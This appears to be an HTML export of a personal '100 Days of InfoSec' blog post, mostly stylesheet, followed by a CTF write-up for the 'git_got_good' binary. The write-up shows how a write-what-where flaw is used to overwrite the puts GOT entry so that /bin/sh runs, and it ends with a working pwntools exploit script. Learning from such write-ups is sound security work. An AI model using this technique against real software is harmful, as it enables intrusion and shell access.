		ol.lst-kix_avc0gcoxesrz-6.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-6 0
		}

		.lst-kix_pj27egx948rq-2>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-2
		}

		.lst-kix_5bbn6o1fums7-8>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-8
		}

		ol.lst-kix_fi2xbrv6fzbg-7.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-7 0
		}

		ol.lst-kix_n6wv8d8mqg4j-2.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-2 0
		}

		ol.lst-kix_q172a0nf55p3-0.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-0 0
		}

		ol.lst-kix_pj27egx948rq-6.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-6 0
		}

		ol.lst-kix_n6wv8d8mqg4j-1.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-1 0
		}

		.lst-kix_2yzjaagjqxah-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-5>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-5
		}

		ol.lst-kix_5bbn6o1fums7-7.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-7 0
		}

		.lst-kix_2yzjaagjqxah-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_n6wv8d8mqg4j-3>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-3
		}

		.lst-kix_2yzjaagjqxah-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_2yzjaagjqxah-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-6>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-6
		}

		ol.lst-kix_avc0gcoxesrz-4.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-4 0
		}

		.lst-kix_avc0gcoxesrz-7>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-7
		}

		ol.lst-kix_q172a0nf55p3-2.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-2 0
		}

		.lst-kix_q172a0nf55p3-5>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-5, lower-roman) ". "
		}

		.lst-kix_q172a0nf55p3-2>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-2, lower-roman) ". "
		}

		.lst-kix_q172a0nf55p3-6>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-6, decimal) ". "
		}

		ol.lst-kix_t8twi5tix7m3-1.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-1 0
		}

		.lst-kix_fi2xbrv6fzbg-2>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-2, lower-roman) ". "
		}

		.lst-kix_fi2xbrv6fzbg-6>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-6, decimal) ". "
		}

		.lst-kix_5bbn6o1fums7-1>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-1
		}

		ul.lst-kix_hkg89eyxvtvi-0 {
			list-style-type: none
		}

		.lst-kix_q172a0nf55p3-1>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-1, lower-latin) ". "
		}

		.lst-kix_571au0wapsr5-3>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-3
		}

		.lst-kix_fi2xbrv6fzbg-5>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-5, lower-roman) ". "
		}

		ol.lst-kix_pj27egx948rq-4.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-4 0
		}

		ul.lst-kix_hkg89eyxvtvi-1 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-2 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-3 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-4 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-5 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-6 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-7 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-8 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-3.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-3 0
		}

		ol.lst-kix_t8twi5tix7m3-7.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-7 0
		}

		ol.lst-kix_q172a0nf55p3-3.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-3 0
		}

		.lst-kix_n6wv8d8mqg4j-5>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-5
		}

		.lst-kix_fi2xbrv6fzbg-1>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-1, lower-latin) ". "
		}

		.lst-kix_hkg89eyxvtvi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_hkg89eyxvtvi-3>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-1 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-0 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-6.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-6 0
		}

		.lst-kix_hkg89eyxvtvi-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_hkg89eyxvtvi-7>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_5lp3gqbxm2h8-5 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-4 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-3 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-2 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-0.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-0 0
		}

		ul.lst-kix_5lp3gqbxm2h8-8 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-8>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_5lp3gqbxm2h8-7 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-6 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5bbn6o1fums7-6>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-6
		}

		.lst-kix_571au0wapsr5-8>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-8
		}

		.lst-kix_571au0wapsr5-5>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-5, lower-roman) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-0 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-2>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-2, lower-roman) ". "
		}

		.lst-kix_pj27egx948rq-6>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-6, decimal) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-7 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-5>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_lh5aqr9xz8oa-8 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-5 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-6 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-3 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-3>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-3, decimal) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-4 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-1 {
			list-style-type: none
		}

		.lst-kix_571au0wapsr5-1>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-1, lower-latin) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-2 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-0 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-6>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-6
		}

		ol.lst-kix_avc0gcoxesrz-1 {
			list-style-type: none
		}

		.lst-kix_5bbn6o1fums7-4>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-4
		}

		ol.lst-kix_avc0gcoxesrz-8 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-6.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-6 0
		}

		ol.lst-kix_avc0gcoxesrz-6 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-7 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-0>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-0, decimal) ". "
		}

		ol.lst-kix_avc0gcoxesrz-4 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-8>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-8, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-7>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-7, lower-latin) ". "
		}

		ol.lst-kix_avc0gcoxesrz-5 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-2.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-2 0
		}

		ol.lst-kix_avc0gcoxesrz-2 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-3 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-0.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-0 0
		}

		.lst-kix_pj27egx948rq-4>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-4
		}

		.lst-kix_n6wv8d8mqg4j-7>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-7
		}

		ol.lst-kix_t8twi5tix7m3-5.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-5 0
		}

		ol.lst-kix_avc0gcoxesrz-0.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-0 0
		}

		.lst-kix_avc0gcoxesrz-4>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-4, lower-latin) ". "
		}

		.lst-kix_fi2xbrv6fzbg-1>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-1
		}

		ol.lst-kix_q172a0nf55p3-5 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-4 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-7.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-7 0
		}

		.lst-kix_c8glqpz4x2ma-8>li:before {
			content: "-  "
		}

		ol.lst-kix_q172a0nf55p3-3 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-2 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-0>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-0, decimal) ". "
		}

		ol.lst-kix_t8twi5tix7m3-3.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-3 0
		}

		ol.lst-kix_q172a0nf55p3-8 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-7 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-6 {
			list-style-type: none
		}

		.lst-kix_c8glqpz4x2ma-0>li:before {
			content: "-  "
		}

		.lst-kix_avc0gcoxesrz-4>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-4
		}

		.lst-kix_c8glqpz4x2ma-4>li:before {
			content: "-  "
		}

		ol.lst-kix_t8twi5tix7m3-4.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-4 0
		}

		ol.lst-kix_q172a0nf55p3-8.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-8 0
		}

		.lst-kix_2yzjaagjqxah-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_q172a0nf55p3-5>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-5
		}

		.lst-kix_2yzjaagjqxah-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_fi2xbrv6fzbg-8>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-8
		}

		.lst-kix_n6wv8d8mqg4j-0>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-0
		}

		ol.lst-kix_q172a0nf55p3-1 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-0 {
			list-style-type: none
		}

		.lst-kix_571au0wapsr5-1>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-1
		}

		ol {
			margin: 0;
			padding: 0
		}

		table td,
		table th {
			padding: 0
		}

		.c8 {
			color: #ce9178;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 12pt;
			font-family: "Courier New";
			font-style: normal
		}

		.c1 {
			color: #434343;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Montserrat";
			font-style: normal
		}

		.c17 {
			color: #000000;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Roboto Mono";
			font-style: normal
		}

		.c26 {
			color: #d7ba7d;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 12pt;
			font-family: "Courier New";
			font-style: normal
		}

		.c3 {
			color: #000000;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Montserrat";
			font-style: normal
		}

		.c5 {
			color: #000000;
			font-weight: 300;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Roboto Mono";
			font-style: normal
		}

		.c25 {
			color: #000000;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 11pt;
			font-family: "Arial";
			font-style: normal
		}

		.c2 {
			background-color: #1e1e1e;
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.3571428571428572;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c0 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left;
			height: 11pt
		}

		.c10 {
			color: #d4d4d4;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 12pt;
			font-family: "Courier New";
			font-style: normal
		}

		.c24 {
			color: #000000;
			font-weight: 700;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Roboto Mono";
			font-style: normal
		}

		.c12 {
			padding-top: 14pt;
			text-indent: 36pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: right
		}

		.c6 {
			color: #6a9955;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 12pt;
			font-family: "Courier New";
			font-style: normal
		}

		.c18 {
			padding-top: 14pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c21 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: center
		}

		.c4 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c15 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #ce9178;
			font-weight: 400
		}

		.c14 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #d4d4d4;
			font-weight: 400
		}

		.c9 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #569cd6;
			font-weight: 400
		}

		.c20 {
			font-size: 18pt;
			font-family: "Montserrat";
			color: #000000;
			font-weight: 900
		}

		.c7 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #c586c0;
			font-weight: 400
		}

		.c23 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #6a9955;
			font-weight: 400
		}

		.c28 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #d7ba7d;
			font-weight: 400
		}

		.c22 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #b5cea8;
			font-weight: 400
		}

		.c11 {
			background-color: #ffffff;
			max-width: 600pt;
			padding: 72pt 72pt 72pt 72pt;
			margin: auto;
		}

		.c19 {
			font-family: "Montserrat";
			color: #000000;
			font-weight: 800
		}

		.c27 {
			padding: 0;
			margin: 0
		}

		.c13 {
			margin-left: 36pt;
			padding-left: 0pt
		}

		.c16 {
			height: 11pt
		}

		.c29 {
			height: 14pt
		}

		.title {
			padding-top: 0pt;
			color: #000000;
			font-size: 26pt;
			padding-bottom: 3pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.subtitle {
			padding-top: 0pt;
			color: #666666;
			font-size: 15pt;
			padding-bottom: 16pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		li {
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		p {
			margin: 0;
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		h1 {
			padding-top: 20pt;
			color: #000000;
			font-size: 20pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h2 {
			padding-top: 18pt;
			color: #000000;
			font-size: 16pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h3 {
			padding-top: 16pt;
			color: #434343;
			font-size: 14pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h4 {
			padding-top: 14pt;
			color: #666666;
			font-size: 12pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h5 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h6 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			font-style: italic;
			orphans: 2;
			widows: 2;
			text-align: left
		}
	</style>
</head>

<body class="c11">
	<h3 class="c12" id="h.3zvpwyx0el37"><span class="c20">72<br></span><span
			class="c20">/<br>100<br>Days<br>Of<br>InfoSec</span>
		<hr>
	</h3>
	<h3 class="c18" id="h.uhn6dzi5itr4"><span class="c19">CTFd &mdash; &nbsp;Git Got Good (part 1 - overwriting GOT
			entry)</span></h3>
	<p class="c0"><span class="c25"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c3">FIrst off, lets checksec the binary :</span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c3">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Arch:
			&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;amd64-64-little</span></p>
	<p class="c4"><span
			class="c3">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;RELRO:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Partial
			RELRO</span></p>
	<p class="c4"><span
			class="c3">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Stack:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Canary
			found</span></p>
	<p class="c4"><span class="c3">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NX: &nbsp;
			&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NX enabled</span></p>
	<p class="c4"><span class="c3">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PIE:
			&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;No PIE (0x400000)</span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c3">Let&rsquo;s look at the disassembly : </span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 732.40px; height: 761.50px;"><img
				alt="" src="images/image1day73.png"
				style="width: 1880.73px; height: 1056.47px; margin-left: -753.50px; margin-top: -216.71px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c3">So there&rsquo;s an fgets function call at 0x4007d9 which reads user input. After
			that there is a printf call and a puts call. The printf only prints out the string passed to it so
			it&rsquo;s not any use but the puts takes whatever is in rdi and prints that to the screen. Maybe we can use
			that. Let&rsquo;s explore the fgets first</span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c3">esi = 0x18 that means it accepts 24 bytes of input</span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c3">When I send it &nbsp;&lsquo;A&rsquo;*8 + &lsquo;B&rsquo;*8 + &lsquo;C&rsquo;*8 (cause
			64 bit/8 byte architecture) I see two things: </span></p>
	<ol class="c27 lst-kix_571au0wapsr5-0 start" start="1">
		<li class="c4 c13"><span class="c3">My input is split up into 8 byte chunks and stored in registers rax, rdx and
				rcx respectively</span></li>
		<li class="c4 c13"><span class="c3">the program crashes at 0x400800 &lt;main+149&gt; where the instruction is
				mov rax into [rcx]. Since dereference rcx is not a valid address the program crashes, makes sense
			</span></li>
	</ol>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c3">What this tells me is that I can craft my payload in a way that rcx is a valid
			address and whatever is at rax (first 8 bytes of my input) will be written at [rcx]. So now I have a way to
			way what I want and where I want it.</span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c3">Another interesting thing is that the next instruction after the crash moves rdx into
			[rcx + 8]. </span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c3">rax &nbsp;&rarr; &nbsp;[rcx]</span></p>
	<p class="c4"><span class="c3">rdx &nbsp;&rarr; &nbsp;[rcx + 8]</span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c3">Now what&rsquo;s our target address. Lets see what the GOT entries look like :</span>
	</p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c5">objdump --dynamic-reloc ./git_got_good &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
			&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
			&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </span></p>
	<p class="c0"><span class="c5"></span></p>
	<p class="c4"><span class="c5">./git_got_good: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;file format
			elf64-x86-64</span></p>
	<p class="c0"><span class="c5"></span></p>
	<p class="c4"><span class="c5">DYNAMIC RELOCATION RECORDS</span></p>
	<p class="c4"><span class="c5">OFFSET &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;TYPE
			&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;VALUE</span></p>
	<p class="c4"><span class="c5">0000000000600ff8 R_X86_64_GLOB_DAT &nbsp;__gmon_start__</span></p>
	<p class="c4"><span class="c5">0000000000601060 R_X86_64_COPY
			&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;stdout@@GLIBC_2.2.5</span></p>
	<p class="c4"><span class="c5">0000000000601070 R_X86_64_COPY
			&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;stdin@@GLIBC_2.2.5</span></p>
	<p class="c4"><span class="c24">0000000000601018 R_X86_64_JUMP_SLOT &nbsp;puts@GLIBC_2.2.5</span></p>
	<p class="c4"><span class="c5">0000000000601020 R_X86_64_JUMP_SLOT &nbsp;__stack_chk_fail@GLIBC_2.4</span></p>
	<p class="c4"><span class="c5">0000000000601028 R_X86_64_JUMP_SLOT &nbsp;system@GLIBC_2.2.5</span></p>
	<p class="c4"><span class="c5">0000000000601030 R_X86_64_JUMP_SLOT &nbsp;printf@GLIBC_2.2.5</span></p>
	<p class="c4"><span class="c5">0000000000601038 R_X86_64_JUMP_SLOT &nbsp;__libc_start_main@GLIBC_2.2.5</span></p>
	<p class="c4"><span class="c5">0000000000601040 R_X86_64_JUMP_SLOT &nbsp;fgets@GLIBC_2.2.5</span></p>
	<p class="c4"><span class="c5">0000000000601048 R_X86_64_JUMP_SLOT &nbsp;setvbuf@GLIBC_2.2.5</span></p>
	<p class="c0"><span class="c5"></span></p>
	<p class="c4"><span class="c3">&nbsp;</span></p>
	<p class="c4"><span class="c3">The one in bold is the interesting one, the puts call (the second one, why? Because
			by the time fgets gets called only the second one is left to be overwritten). </span></p>
	<p class="c0"><span class="c5"></span></p>
	<p class="c0"><span class="c5"></span></p>
	<p class="c4"><span class="c5">Ideally, when the program call puts@plt, the PLT points it to the address 0x601018
			where GOT seeks to resolve the function call to puts@GLIBC_2.2.5. So if we replace 0x601018 with say the
			address of the run_cmd function, the program would run that function with whatever is the string that is
			passed to it.</span></p>
	<p class="c0"><span class="c5"></span></p>
	<p class="c0"><span class="c5"></span></p>
	<p class="c4"><span class="c5">Again, our pieces are </span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c3">rax &nbsp;&rarr; &nbsp;[rcx]</span></p>
	<p class="c4"><span class="c3">rdx &nbsp;&rarr; &nbsp;[rcx + 8]</span></p>
	<p class="c4"><span class="c3">Before puts is called the second time, whatever is in rax is moved to rdi</span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c17">So if we are calling run_cmd instead of puts, we need our string
			&lsquo;/bin/sh\x00&rsquo; to be in rdi or rax (first 8 bytes). Then we need the address of run_cmd
			(0x0040074b) to be placed at 0x601018. The only way to deference an address is through rcx. Since rdx is the
			other part of the input that gets stored at [rcx &nbsp;+ 8] we can have the address of the run_cmd at rdx
			(second 8 bytes) and have [rcx + 8] == 0x601018. Thus rcx needs to be equal to 0x601010 (the third 8
			bytes)</span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c4"><span class="c3">So out payload becomes &lsquo;/bin/sh/\x00&rsquo; + run_cmd_addr + puts_offset</span>
	</p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c2"><span class="c7">from</span><span class="c14">&nbsp;pwn </span><span class="c7">import</span><span
			class="c10">&nbsp;*</span></p>
	<p class="c2 c16"><span class="c10"></span></p>
	<p class="c2"><span class="c14">run_cmd = p64(</span><span class="c9">0x</span><span class="c22">40074b</span><span
			class="c10">)</span></p>
	<p class="c2"><span class="c14">puts_offset = p64(</span><span class="c9">0x</span><span
			class="c22">601010</span><span class="c10">)</span></p>
	<p class="c2 c16"><span class="c10"></span></p>
	<p class="c2"><span class="c14">payload =</span><span class="c15">&#39;/bin/sh</span><span
			class="c28">\x00</span><span class="c15">&#39;</span><span class="c14">&nbsp;+ run_cmd + puts_offset +
		</span><span class="c15">&#39;</span><span class="c26">\n</span></p>
	<p class="c2"><span class="c14">context.log_level = </span><span class="c8">&#39;debug&#39;</span></p>
	<p class="c2 c16"><span class="c10"></span></p>
	<p class="c2"><span class="c14">p = process(</span><span class="c15">&#39;./git_got_good</span><span
			class="c14">)</span></p>
	<p class="c2 c16"><span class="c10"></span></p>
	<p class="c2"><span class="c14">gdb_script = </span><span class="c8">&#39;&#39;&#39;</span></p>
	<p class="c2"><span class="c8">set follow-fork-mode parent</span></p>
	<p class="c2"><span class="c8">break * 0x400800</span></p>
	<p class="c2"><span class="c8">break puts</span></p>
	<p class="c2"><span class="c8">break printf</span></p>
	<p class="c2"><span class="c8">break fgets</span></p>
	<p class="c2"><span class="c8">&#39;&#39;&#39;</span></p>
	<p class="c2"><span class="c23"># 0x400800 the address where the program crashes</span></p>
	<p class="c2"><span class="c6"># gdb.attach(p, gdb_script)</span></p>
	<p class="c2 c16"><span class="c6"></span></p>
	<p class="c2"><span class="c14">p.sendafter(</span><span class="c15">&#39;save: &#39;</span><span class="c10">,
			payload)</span></p>
	<p class="c2"><span class="c10">p.interactive()</span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c5"></span></p>
	<p class="c0"><span class="c5"></span></p>
